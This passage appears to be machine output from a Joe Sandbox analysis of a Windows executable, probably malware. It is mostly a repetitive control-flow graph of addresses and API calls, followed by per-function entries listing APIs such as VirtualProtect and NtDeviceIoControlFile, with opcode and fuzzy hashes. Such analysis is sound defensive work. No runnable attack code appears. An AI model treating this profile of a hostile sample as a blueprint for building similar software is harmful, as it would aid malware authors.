calls 4612->4614 4615 7ff7970c1394 2 API calls 4613->4615 4614->4613 4616 7ff7970c144f 4615->4616 4617 7ff7970c1394 2 API calls 4616->4617 4618 7ff7970c1459 4617->4618 4619 7ff7970c145e 4618->4619 4620 7ff7970c1394 2 API calls 4618->4620 4621 7ff7970c1394 2 API calls 4619->4621 4620->4619 4622 7ff7970c1468 4621->4622 4623 7ff7970c146d 4622->4623 4624 7ff7970c1394 2 API calls 4622->4624 4625 7ff7970c1394 2 API calls 4623->4625 4624->4623 4626 7ff7970c1477 4625->4626 4627 7ff7970c147c 4626->4627 4628 7ff7970c1394 2 API calls 4626->4628 4629 7ff7970c1394 2 API calls 4627->4629 4628->4627 4630 7ff7970c1486 4629->4630 4631 7ff7970c148b 4630->4631 4632 7ff7970c1394 2 API calls 4630->4632 4633 7ff7970c1394 2 API calls 4631->4633 4632->4631 4634 7ff7970c1495 4633->4634 4635 7ff7970c149a 4634->4635 4636 7ff7970c1394 2 API calls 4634->4636 4637 7ff7970c1394 2 API calls 4635->4637 4636->4635 4638 7ff7970c14a4 4637->4638 4639 7ff7970c14a9 4638->4639 4640 7ff7970c1394 2 API calls 4638->4640 4641 7ff7970c1394 2 API calls 4639->4641 4640->4639 4642 7ff7970c14b3 4641->4642 4643 7ff7970c14b8 4642->4643 4644 7ff7970c1394 2 API calls 4642->4644 4645 7ff7970c1394 2 API calls 4643->4645 4644->4643 4646 7ff7970c14c2 4645->4646 4647 7ff7970c14c7 4646->4647 4648 7ff7970c1394 2 API calls 4646->4648 4649 7ff7970c1394 2 API calls 4647->4649 4648->4647 4650 7ff7970c14d1 4649->4650 4651 7ff7970c14d6 4650->4651 4652 7ff7970c1394 2 API calls 4650->4652 4653 7ff7970c1394 2 API calls 4651->4653 4652->4651 4654 7ff7970c14e0 4653->4654 4655 7ff7970c14e5 4654->4655 4656 7ff7970c1394 2 API calls 4654->4656 4657 7ff7970c1394 2 API calls 4655->4657 4656->4655 4658 7ff7970c14ef 4657->4658 4659 7ff7970c14f4 4658->4659 4660 7ff7970c1394 2 API calls 4658->4660 4661 7ff7970c1394 2 API calls 4659->4661 4660->4659 4662 7ff7970c14fe 4661->4662 4663 7ff7970c1394 2 API calls 4662->4663 4664 7ff7970c1503 4663->4664 4665 7ff7970c1512 4664->4665 4666 7ff7970c1394 2 API calls 4664->4666 4667 7ff7970c1394 2 API calls 4665->4667 4666->4665 4668 7ff7970c1521 4667->4668 4669 7ff7970c1394 2 API calls 4668->4669 4670 7ff7970c152b 4669->4670 4671 7ff7970c1530 4670->4671 4672 7ff7970c1394 2 API calls 4670->4672 4673 7ff7970c1394 2 API calls 4671->4673 4672->4671 4674 7ff7970c153a 4673->4674 4675 7ff7970c153f 4674->4675 4676 7ff7970c1394 2 API calls 4674->4676 4677 7ff7970c1394 2 API calls 4675->4677 4676->4675 4678 7ff7970c154e 4677->4678 4679 7ff7970c1394 2 API calls 4678->4679 4680 7ff7970c1558 4679->4680 4681 7ff7970c155d 4680->4681 4682 7ff7970c1394 2 API calls 4680->4682 4683 7ff7970c1394 2 API calls 4681->4683 4682->4681 4684 7ff7970c1567 4683->4684 4685 7ff7970c156c 4684->4685 4686 7ff7970c1394 2 API calls 4684->4686 4687 7ff7970c1394 2 API calls 4685->4687 4686->4685 4688 7ff7970c1576 4687->4688 4689 7ff7970c157b 4688->4689 4690 7ff7970c1394 2 API calls 4688->4690 4691 7ff7970c1394 2 API calls 4689->4691 4690->4689 4692 7ff7970c1585 4691->4692 4693 7ff7970c158a 4692->4693 4694 7ff7970c1394 2 API calls 4692->4694 4695 7ff7970c1394 2 API calls 4693->4695 4694->4693 4696 7ff7970c1599 4695->4696 4697 7ff7970c1394 2 API calls 4696->4697 4698 7ff7970c15a3 4697->4698 4699 7ff7970c15a8 4698->4699 4700 7ff7970c1394 2 API calls 4698->4700 4701 7ff7970c1394 2 API calls 4699->4701 4700->4699 4702 7ff7970c15b7 4701->4702 4703 7ff7970c1394 2 API calls 4702->4703 4704 7ff7970c15c1 4703->4704 4705 7ff7970c15c6 4704->4705 4706 7ff7970c1394 2 API calls 4704->4706 4707 7ff7970c1394 2 API calls 4705->4707 4706->4705 4708 7ff7970c15d0 4707->4708 4709 7ff7970c15d5 4708->4709 4710 7ff7970c1394 2 API calls 4708->4710 4711 7ff7970c1394 2 API calls 4709->4711 4710->4709 4712 7ff7970c15df 4711->4712 4713 7ff7970c15e4 4712->4713 4714 7ff7970c1394 2 API calls 4712->4714 4715 7ff7970c1394 2 API calls 4713->4715 4714->4713 4716 7ff7970c15f3 4715->4716 4716->4152 4718 7ff7970c1394 2 API calls 4717->4718 4719 7ff7970c14c2 4718->4719 4720 7ff7970c14c7 4719->4720 4721 7ff7970c1394 2 API calls 4719->4721 4722 7ff7970c1394 2 API calls 4720->4722 4721->4720 4723 7ff7970c14d1 4722->4723 4724 7ff7970c14d6 4723->4724 4725 7ff7970c1394 2 API calls 4723->4725 4726 7ff7970c1394 2 API calls 4724->4726 4725->4724 4727 7ff7970c14e0 4726->4727 4728 7ff7970c14e5 4727->4728 4729 7ff7970c1394 2 API calls 4727->4729 4730 7ff7970c1394 2 API calls 4728->4730 4729->4728 4731 7ff7970c14ef 4730->4731 4732 7ff7970c14f4 4731->4732 4733 7ff7970c1394 2 API calls 4731->4733 4734 7ff7970c1394 2 API calls 4732->4734 4733->4732 4735 7ff7970c14fe 4734->4735 4736 7ff7970c1394 2 API calls 4735->4736 4737 7ff7970c1503 4736->4737 4738 7ff7970c1512 4737->4738 4739 7ff7970c1394 2 API calls 4737->4739 4740 7ff7970c1394 2 API calls 4738->4740 4739->4738 4741 7ff7970c1521 4740->4741 4742 7ff7970c1394 2 API calls 4741->4742 4743 7ff7970c152b 4742->4743 4744 7ff7970c1530 4743->4744 4745 7ff7970c1394 2 API calls 4743->4745 4746 7ff7970c1394 2 API calls 4744->4746 4745->4744 4747 7ff7970c153a 4746->4747 4748 7ff7970c153f 4747->4748 4749 7ff7970c1394 2 API calls 4747->4749 4750 7ff7970c1394 2 API calls 4748->4750 4749->4748 4751 7ff7970c154e 4750->4751 4752 7ff7970c1394 2 API calls 4751->4752 4753 7ff7970c1558 4752->4753 4754 7ff7970c155d 4753->4754 4755 7ff7970c1394 2 API calls 4753->4755 4756 7ff7970c1394 2 API calls 4754->4756 4755->4754 4757 7ff7970c1567 4756->4757 4758 7ff7970c156c 4757->4758 4759 7ff7970c1394 2 API calls 4757->4759 4760 7ff7970c1394 2 API calls 4758->4760 4759->4758 4761 7ff7970c1576 4760->4761 4762 7ff7970c157b 4761->4762 4763 7ff7970c1394 2 API calls 4761->4763 4764 7ff7970c1394 2 API calls 4762->4764 4763->4762 4765 7ff7970c1585 4764->4765 4766 7ff7970c158a 4765->4766 4767 7ff7970c1394 2 API calls 4765->4767 4768 7ff7970c1394 2 API calls 4766->4768 4767->4766 4769 7ff7970c1599 4768->4769 4770 7ff7970c1394 2 API calls 4769->4770 4771 7ff7970c15a3 4770->4771 4772 7ff7970c15a8 4771->4772 4773 7ff7970c1394 2 API calls 4771->4773 4774 7ff7970c1394 2 API calls 4772->4774 4773->4772 4775 7ff7970c15b7 4774->4775 4776 7ff7970c1394 2 API calls 4775->4776 4777 7ff7970c15c1 4776->4777 4778 7ff7970c15c6 4777->4778 4779 7ff7970c1394 2 API calls 4777->4779 4780 7ff7970c1394 2 API calls 4778->4780 4779->4778 4781 7ff7970c15d0 4780->4781 4782 7ff7970c15d5 4781->4782 4783 7ff7970c1394 2 API calls 4781->4783 4784 7ff7970c1394 2 API calls 4782->4784 4783->4782 4785 7ff7970c15df 4784->4785 4786 7ff7970c15e4 4785->4786 4787 7ff7970c1394 2 API calls 4785->4787 4788 7ff7970c1394 2 API calls 4786->4788 4787->4786 4789 7ff7970c15f3 4788->4789 4789->4239 4791 7ff7970c1394 2 API calls 4790->4791 4792 7ff7970c15df 4791->4792 4793 7ff7970c15e4 4792->4793 4794 7ff7970c1394 2 API calls 4792->4794 4795 7ff7970c1394 2 API calls 4793->4795 4794->4793 4796 7ff7970c15f3 4795->4796 4796->4239 4798 7ff7970c1394 2 API calls 4797->4798 4799 7ff7970c1495 4798->4799 4800 7ff7970c149a 4799->4800 4801 7ff7970c1394 2 API calls 4799->4801 4802 7ff7970c1394 2 API calls 4800->4802 4801->4800 4803 7ff7970c14a4 4802->4803 4804 7ff7970c14a9 4803->4804 4805 7ff7970c1394 2 API calls 4803->4805 4806 7ff7970c1394 2 API calls 4804->4806 4805->4804 4807 7ff7970c14b3 4806->4807 4808 7ff7970c14b8 4807->4808 4809 7ff7970c1394 2 API calls 4807->4809 4810 7ff7970c1394 2 API calls 4808->4810 4809->4808 4811 7ff7970c14c2 4810->4811 4812 7ff7970c14c7 4811->4812 4813 7ff7970c1394 2 API calls 4811->4813 4814 7ff7970c1394 2 API calls 4812->4814 4813->4812 4815 7ff7970c14d1 4814->4815 4816 7ff7970c14d6 4815->4816 4817 7ff7970c1394 2 API calls 4815->4817 4818 7ff7970c1394 2 API calls 4816->4818 4817->4816 4819 7ff7970c14e0 4818->4819 4820 7ff7970c14e5 4819->4820 4821 7ff7970c1394 2 API calls 4819->4821 4822 7ff7970c1394 2 API calls 4820->4822 4821->4820 4823 7ff7970c14ef 4822->4823 4824 7ff7970c14f4 4823->4824 4825 7ff7970c1394 2 API calls 4823->4825 4826 7ff7970c1394 2 API calls 4824->4826 4825->4824 4827 7ff7970c14fe 4826->4827 4828 7ff7970c1394 2 API calls 4827->4828 4829 7ff7970c1503 4828->4829 4830 7ff7970c1512 4829->4830 4831 7ff7970c1394 2 API calls 4829->4831 4832 7ff7970c1394 2 API calls 4830->4832 4831->4830 4833 7ff7970c1521 4832->4833 4834 7ff7970c1394 2 API calls 4833->4834 4835 7ff7970c152b 4834->4835 4836 7ff7970c1530 4835->4836 4837 7ff7970c1394 2 API calls 4835->4837 4838 7ff7970c1394 2 API calls 4836->4838 4837->4836 4839 7ff7970c153a 4838->4839 4840 7ff7970c153f 4839->4840 4841 7ff7970c1394 2 API calls 4839->4841 4842 7ff7970c1394 2 API calls 4840->4842 4841->4840 4843 7ff7970c154e 4842->4843 4844 7ff7970c1394 2 API calls 4843->4844 4845 7ff7970c1558 4844->4845 4846 7ff7970c155d 4845->4846 4847 7ff7970c1394 2 API calls 4845->4847 4848 7ff7970c1394 2 API calls 4846->4848 4847->4846 4849 7ff7970c1567 4848->4849 4850 7ff7970c156c 4849->4850 4851 7ff7970c1394 2 API calls 4849->4851 4852 7ff7970c1394 2 API calls 4850->4852 4851->4850 4853 7ff7970c1576 4852->4853 4854 7ff7970c157b 4853->4854 4855 7ff7970c1394 2 API calls 4853->4855 4856 7ff7970c1394 2 API calls 4854->4856 4855->4854 4857 7ff7970c1585 4856->4857 4858 7ff7970c158a 4857->4858 4859 7ff7970c1394 2 API calls 4857->4859 4860 7ff7970c1394 2 API calls 4858->4860 4859->4858 4861 7ff7970c1599 4860->4861 4862 7ff7970c1394 2 API calls 4861->4862 4863 7ff7970c15a3 4862->4863 4864 7ff7970c15a8 4863->4864 4865 7ff7970c1394 2 API calls 4863->4865 4866 7ff7970c1394 2 API calls 4864->4866 4865->4864 4867 7ff7970c15b7 4866->4867 4868 7ff7970c1394 2 API calls 4867->4868 4869 7ff7970c15c1 4868->4869 4870 7ff7970c15c6 4869->4870 4871 7ff7970c1394 2 API calls 4869->4871 4872 7ff7970c1394 2 API calls 4870->4872 4871->4870 4873 7ff7970c15d0 4872->4873 4874 7ff7970c15d5 4873->4874 4875 7ff7970c1394 2 API calls 4873->4875 4876 7ff7970c1394 2 API calls 4874->4876 4875->4874 4877 7ff7970c15df 4876->4877 4878 7ff7970c15e4 4877->4878 4879 7ff7970c1394 2 API calls 4877->4879 4880 7ff7970c1394 2 API calls 4878->4880 4879->4878 4881 7ff7970c15f3 4880->4881 4881->4240 4882 7ff7970c149a 4881->4882 4883 7ff7970c1394 2 API calls 4882->4883 4884 7ff7970c14a4 4883->4884 4885 7ff7970c14a9 4884->4885 4886 7ff7970c1394 2 API calls 4884->4886 4887 7ff7970c1394 2 API calls 4885->4887 4886->4885 4888 7ff7970c14b3 4887->4888 4889 7ff7970c14b8 4888->4889 4890 7ff7970c1394 2 API calls 4888->4890 4891 7ff7970c1394 2 API calls 4889->4891 4890->4889 4892 7ff7970c14c2 4891->4892 4893 7ff7970c14c7 4892->4893 4894 7ff7970c1394 2 API calls 4892->4894 4895 7ff7970c1394 2 API calls 4893->4895 4894->4893 4896 7ff7970c14d1 4895->4896 4897 7ff7970c14d6 4896->4897 4898 7ff7970c1394 2 API calls 4896->4898 4899 7ff7970c1394 2 API calls 4897->4899 4898->4897 4900 7ff7970c14e0 4899->4900 4901 7ff7970c14e5 4900->4901 4902 7ff7970c1394 2 API calls 4900->4902 4903 7ff7970c1394 2 API calls 4901->4903 4902->4901 4904 7ff7970c14ef 4903->4904 4905 7ff7970c14f4 4904->4905 4906 7ff7970c1394 2 API calls 4904->4906 4907 7ff7970c1394 2 API calls 4905->4907 4906->4905 4908 7ff7970c14fe 4907->4908 4909 7ff7970c1394 2 API calls 4908->4909 4910 7ff7970c1503 4909->4910 4911 7ff7970c1512 4910->4911 4912 7ff7970c1394 2 API calls 4910->4912 4913 7ff7970c1394 2 API calls 4911->4913 4912->4911 4914 7ff7970c1521 4913->4914 4915 7ff7970c1394 2 API calls 4914->4915 4916 7ff7970c152b 4915->4916 4917 7ff7970c1530 4916->4917 4918 7ff7970c1394 2 API calls 4916->4918 4919 7ff7970c1394 2 API calls 4917->4919 4918->4917 4920 7ff7970c153a 4919->4920 4921 7ff7970c153f 4920->4921 4922 7ff7970c1394 2 API calls 4920->4922 4923 7ff7970c1394 2 API calls 4921->4923 4922->4921 4924 7ff7970c154e 4923->4924 4925 7ff7970c1394 2 API calls 4924->4925 4926 7ff7970c1558 4925->4926 4927 7ff7970c155d 4926->4927 4928 7ff7970c1394 2 API calls 4926->4928 4929 7ff7970c1394 2 API calls 4927->4929 4928->4927 4930 7ff7970c1567 4929->4930 4931 7ff7970c156c 4930->4931 4932 7ff7970c1394 2 API calls 4930->4932 4933 7ff7970c1394 2 API calls 4931->4933 4932->4931 4934 7ff7970c1576 4933->4934 4935 7ff7970c157b 4934->4935 4936 7ff7970c1394 2 API calls 4934->4936 4937 7ff7970c1394 2 API calls 4935->4937 4936->4935 4938 7ff7970c1585 4937->4938 4939 7ff7970c158a 4938->4939 4940 7ff7970c1394 2 API calls 4938->4940 4941 7ff7970c1394 2 API calls 4939->4941 4940->4939 4942 7ff7970c1599 4941->4942 4943 7ff7970c1394 2 API calls 4942->4943 4944 7ff7970c15a3 4943->4944 4945 7ff7970c15a8 4944->4945 4946 7ff7970c1394 2 API calls 4944->4946 4947 7ff7970c1394 2 API calls 4945->4947 4946->4945 4948 7ff7970c15b7 4947->4948 4949 7ff7970c1394 2 API calls 4948->4949 4950 7ff7970c15c1 4949->4950 4951 7ff7970c15c6 4950->4951 4952 7ff7970c1394 2 API calls 4950->4952 4953 7ff7970c1394 2 API calls 4951->4953 4952->4951 4954 7ff7970c15d0 4953->4954 4955 7ff7970c15d5 4954->4955 4956 7ff7970c1394 2 API calls 4954->4956 4957 7ff7970c1394 2 API calls 4955->4957 4956->4955 4958 7ff7970c15df 4957->4958 4959 7ff7970c15e4 4958->4959 4960 7ff7970c1394 2 API calls 4958->4960 4961 7ff7970c1394 2 API calls 4959->4961 4960->4959 4962 7ff7970c15f3 4961->4962 4962->4240 4962->4244 4964 7ff7970c1394 2 API calls 4963->4964 4965 7ff7970c1486 4964->4965 4966 7ff7970c148b 4965->4966 4967 7ff7970c1394 2 API calls 4965->4967 4968 7ff7970c1394 2 API calls 4966->4968 4967->4966 4969 7ff7970c1495 4968->4969 4970 7ff7970c149a 4969->4970 4971 7ff7970c1394 2 API calls 4969->4971 4972 7ff7970c1394 2 API calls 4970->4972 4971->4970 4973 7ff7970c14a4 4972->4973 4974 7ff7970c14a9 4973->4974 4975 7ff7970c1394 2 API calls 4973->4975 4976 7ff7970c1394 2 API calls 4974->4976 4975->4974 4977 7ff7970c14b3 4976->4977 4978 7ff7970c14b8 4977->4978 4979 7ff7970c1394 2 API calls 4977->4979 4980 7ff7970c1394 2 API calls 4978->4980 4979->4978 4981 7ff7970c14c2 4980->4981 4982 7ff7970c14c7 4981->4982 4983 7ff7970c1394 2 API calls 4981->4983 4984 7ff7970c1394 2 API calls 4982->4984 4983->4982 4985 7ff7970c14d1 4984->4985 4986 7ff7970c14d6 4985->4986 4987 7ff7970c1394 2 API calls 4985->4987 4988 7ff7970c1394 2 API calls 4986->4988 4987->4986 4989 7ff7970c14e0 4988->4989 4990 7ff7970c14e5 4989->4990 4991 7ff7970c1394 2 API calls 4989->4991 4992 7ff7970c1394 2 API calls 4990->4992 4991->4990 4993 7ff7970c14ef 4992->4993 4994 7ff7970c14f4 4993->4994 4995 7ff7970c1394 2 API calls 4993->4995 4996 7ff7970c1394 2 API calls 4994->4996 4995->4994 4997 7ff7970c14fe 4996->4997 4998 7ff7970c1394 2 API calls 4997->4998 4999 7ff7970c1503 4998->4999 5000 7ff7970c1512 4999->5000 5001 7ff7970c1394 2 API calls 4999->5001 5002 7ff7970c1394 2 API calls 5000->5002 5001->5000 5003 7ff7970c1521 5002->5003 5004 7ff7970c1394 2 API calls 5003->5004 5005 7ff7970c152b 5004->5005 5006 7ff7970c1530 5005->5006 5007 7ff7970c1394 2 API calls 5005->5007 5008 7ff7970c1394 2 API calls 5006->5008 5007->5006 5009 7ff7970c153a 5008->5009 5010 7ff7970c153f 5009->5010 5011 7ff7970c1394 2 API calls 5009->5011 5012 7ff7970c1394 2 API calls 5010->5012 5011->5010 5013 7ff7970c154e 5012->5013 5014 7ff7970c1394 2 API calls 5013->5014 5015 7ff7970c1558 5014->5015 5016 7ff7970c155d 5015->5016 5017 7ff7970c1394 2 API calls 5015->5017 5018 7ff7970c1394 2 API calls 5016->5018 5017->5016 5019 7ff7970c1567 5018->5019 5020 7ff7970c156c 5019->5020 5021 7ff7970c1394 2 API calls 5019->5021 5022 7ff7970c1394 2 API calls 5020->5022 5021->5020 5023 7ff7970c1576 5022->5023 5024 7ff7970c157b 5023->5024 5025 7ff7970c1394 2 API calls 5023->5025 5026 7ff7970c1394 2 API calls 5024->5026 5025->5024 5027 7ff7970c1585 5026->5027 5028 7ff7970c158a 5027->5028 5029 7ff7970c1394 2 API calls 5027->5029 5030 7ff7970c1394 2 API calls 5028->5030 5029->5028 5031 7ff7970c1599 5030->5031 5032 7ff7970c1394 2 API calls 5031->5032 5033 7ff7970c15a3 5032->5033 5034 7ff7970c15a8 5033->5034 5035 7ff7970c1394 2 API calls 5033->5035 5036 7ff7970c1394 2 API calls 5034->5036 5035->5034 5037 7ff7970c15b7 5036->5037 5038 7ff7970c1394 2 API calls 5037->5038 5039 7ff7970c15c1 5038->5039 5040 7ff7970c15c6 5039->5040 5041 7ff7970c1394 2 API calls 5039->5041 5042 7ff7970c1394 2 API calls 5040->5042 5041->5040 5043 7ff7970c15d0 5042->5043 5044 7ff7970c15d5 5043->5044 5045 7ff7970c1394 2 API calls 5043->5045 5046 7ff7970c1394 2 API calls 5044->5046 5045->5044 5047 7ff7970c15df 5046->5047 5048 7ff7970c15e4 5047->5048 5049 7ff7970c1394 2 API calls 5047->5049 5050 7ff7970c1394 2 API calls 5048->5050 5049->5048 5051 7ff7970c15f3 5050->5051 5051->4249 5053 7ff7970c1394 2 API calls 5052->5053 5054 7ff7970c15d0 5053->5054 5055 7ff7970c15d5 5054->5055 5056 7ff7970c1394 2 API calls 5054->5056 5057 7ff7970c1394 2 API calls 5055->5057 5056->5055 5058 7ff7970c15df 5057->5058 5059 7ff7970c15e4 5058->5059 5060 7ff7970c1394 2 API calls 5058->5060 5061 7ff7970c1394 2 API calls 5059->5061 5060->5059 5062 7ff7970c15f3 5061->5062 5062->4230 5075 7ff7970c2320 strlen 5076 7ff7970c2337 5075->5076 5147 7ff7970c1000 5148 7ff7970c108b __set_app_type 5147->5148 5149 7ff7970c1040 5147->5149 5151 7ff7970c10b6 5148->5151 5149->5148 5150 7ff7970c10e5 5151->5150 5153 7ff7970c1e00 5151->5153 5154 7ff7970c8980 __setusermatherr 5153->5154 5155 7ff7970c1800 5156 7ff7970c1812 5155->5156 5157 7ff7970c1835 fprintf 5156->5157 5125 7ff7970c1e65 5126 7ff7970c1e67 signal 5125->5126 5127 7ff7970c1e99 5126->5127 5128 7ff7970c1e7c 5126->5128 5128->5127 5129 7ff7970c1e82 signal 5128->5129 5129->5127 5158 7ff7970c2104 5159 7ff7970c2111 EnterCriticalSection 5158->5159 5164 7ff7970c2218 5158->5164 5161 7ff7970c220b LeaveCriticalSection 5159->5161 5166 7ff7970c212e 5159->5166 5160 7ff7970c2272 5161->5164 5162 7ff7970c214d TlsGetValue GetLastError 5162->5166 5163 7ff7970c2241 DeleteCriticalSection 5163->5160 5164->5160 5164->5163 5165 7ff7970c2230 free 5164->5165 5165->5163 5165->5165 5166->5161 5166->5162 5106 7ff7970c1ac3 5109 7ff7970c1a70 5106->5109 5107 7ff7970c1b36 5111 7ff7970c1ba0 4 API calls 5107->5111 5108 7ff7970c199e 5110 7ff7970c1a0f 5108->5110 5113 7ff7970c19e9 VirtualProtect 5108->5113 5109->5107 5109->5108 5112 7ff7970c1b53 5109->5112 5111->5112 5113->5108 5077 7ff7970c219e 5078 7ff7970c2272 5077->5078 5079 7ff7970c21ab EnterCriticalSection 5077->5079 5080 7ff7970c2265 LeaveCriticalSection 5079->5080 5082 7ff7970c21c8 5079->5082 5080->5078 5081 7ff7970c21e9 TlsGetValue GetLastError 5081->5082 5082->5080 5082->5081

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1838357304.00007FF7970C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7970C0000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1838303155.00007FF7970C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838432473.00007FF7970C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838459577.00007FF7970CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838483301.00007FF7970CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838759814.00007FF797348000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838782886.00007FF79734A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7970c0000_gq83mrprwy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2643109117-0
                                                                                                                                • Opcode ID: 2bc85885fa4b20875cecf45e0d5a8d7643269e07cdbabcb3a286f5e8c3ee789d
                                                                                                                                • Instruction ID: de85b78863705abf7ea789bf7bd0c1f89cbe18c9930e9c1f60d8cf12a10bc789
                                                                                                                                • Opcode Fuzzy Hash: 2bc85885fa4b20875cecf45e0d5a8d7643269e07cdbabcb3a286f5e8c3ee789d
                                                                                                                                • Instruction Fuzzy Hash: 875146B5A1968289F674BB39E9413B9A3A0BF457C0FD84439CA0DC37A1DE3CE4578324
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • NtDeviceIoControlFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7970C1156), ref: 00007FF7970C13F7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1838357304.00007FF7970C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7970C0000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1838303155.00007FF7970C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838432473.00007FF7970C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838459577.00007FF7970CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838483301.00007FF7970CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838759814.00007FF797348000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838782886.00007FF79734A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7970c0000_gq83mrprwy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ControlDeviceFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3512290074-0
                                                                                                                                • Opcode ID: 44d218f324a4a60e69f590186adc03f2af2ae93ee84cdde52191a9f821aa7650
                                                                                                                                • Instruction ID: b979fee33d98010f86abdcb438b102c09e0e2711ea57b77ae8c479486a3576ed
                                                                                                                                • Opcode Fuzzy Hash: 44d218f324a4a60e69f590186adc03f2af2ae93ee84cdde52191a9f821aa7650
                                                                                                                                • Instruction Fuzzy Hash: E9F0EC7190CB4182E624EB69F85192AB764FB883C0F549435EA9CC3725EF3CE0518B64
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1838357304.00007FF7970C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7970C0000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1838303155.00007FF7970C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838432473.00007FF7970C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838459577.00007FF7970CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838483301.00007FF7970CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838759814.00007FF797348000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838782886.00007FF79734A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7970c0000_gq83mrprwy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: wcslen$memset$wcscat$wcscpy$_wcsnicmp$_wcsicmpmemcpy
                                                                                                                                • String ID: $X&
                                                                                                                                • API String ID: 3717256989-100112515
                                                                                                                                • Opcode ID: dcbd1c9d709a69789d7d1d2e17a23b97666d4dae0ddfc42f9814cb1f84006863
                                                                                                                                • Instruction ID: 39fb25873bbadc46cc95d09a9e5426e0adb28366f44c2adc9b831ac8d462e127
                                                                                                                                • Opcode Fuzzy Hash: dcbd1c9d709a69789d7d1d2e17a23b97666d4dae0ddfc42f9814cb1f84006863
                                                                                                                                • Instruction Fuzzy Hash: A2533E61C2D6C284F735BB39AC422F4E760AF953C4F88533DD98C965A1EF6C6246C329
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1838357304.00007FF7970C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7970C0000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1838303155.00007FF7970C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838432473.00007FF7970C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838459577.00007FF7970CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838483301.00007FF7970CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838759814.00007FF797348000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1838782886.00007FF79734A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7970c0000_gq83mrprwy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: memset$wcscatwcscpywcslen
                                                                                                                                • String ID: $0$0$@$@
                                                                                                                                • API String ID: 4263182637-1413854666
                                                                                                                                • Opcode ID: d0681a75872366e1df4cc69bc956824748cf368e005ae37a644df1e6bc702fed
                                                                                                                                • Instruction ID: cce8cfe5136fc8854fe0667e5ad6de0509bd33bd9c83759c3a428cdb28f3cbc6
                                                                                                                                • Opcode Fuzzy Hash: d0681a75872366e1df4cc69bc956824748cf368e005ae37a644df1e6bc702fed
                                                                                                                                • Instruction Fuzzy Hash: 8EB1826191C6C185F371AB28E8063EAF760FB853C4F840239EA8887695DF7DE146CB59
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1838357304.00007FF7970C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7970C0000, based on PE: true
